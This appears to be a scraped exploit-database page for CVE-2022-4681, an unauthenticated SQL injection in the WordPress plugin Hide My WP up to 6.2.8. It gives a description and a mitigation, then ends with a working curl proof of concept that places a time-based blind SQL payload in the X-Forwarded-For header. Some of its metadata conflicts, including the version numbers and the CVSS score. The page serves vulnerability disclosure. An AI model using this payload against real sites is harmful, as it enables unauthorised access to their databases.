header-logo
Suggest Exploit
vendor:
Hide My WP
by:
Xenofon Vassilakopoulos
8.1
CVSS
CRITICAL
SQL Injection
89
CWE
Product Name: Hide My WP
Affected Version From: 6.2.2008
Affected Version To: 6.2.2008
Patch Exists: NO
Related CWE: CVE-2022-4681
CPE: a:wpwave:hide_my_wp:6.2.8
Metasploit:
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=136413https://www.infosecmatter.com/nessus-plugin-library/?id=62071https://www.infosecmatter.com/nessus-plugin-library/?id=61740https://www.infosecmatter.com/nessus-plugin-library/?id=61786https://www.infosecmatter.com/nessus-plugin-library/?id=64839https://www.infosecmatter.com/nessus-plugin-library/?id=61681https://www.infosecmatter.com/nessus-plugin-library/?id=61769https://www.infosecmatter.com/nessus-plugin-library/?id=64841https://www.infosecmatter.com/nessus-plugin-library/?id=64169https://www.infosecmatter.com/nessus-plugin-library/?id=74748
Platforms Tested:
2023

WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi

The Wordpress Plugin Hide My WP version 6.2.8 and earlier does not properly sanitize user input before using it in a SQL query, which can be exploited by unauthenticated users via an AJAX action to execute malicious SQL commands.

Mitigation:

To mitigate this vulnerability, it is recommended to update the Hide My WP plugin to version 6.2.9 or later. Additionally, input validation and parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi 
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"

Navigation

Suggest Exploit

Services By CQR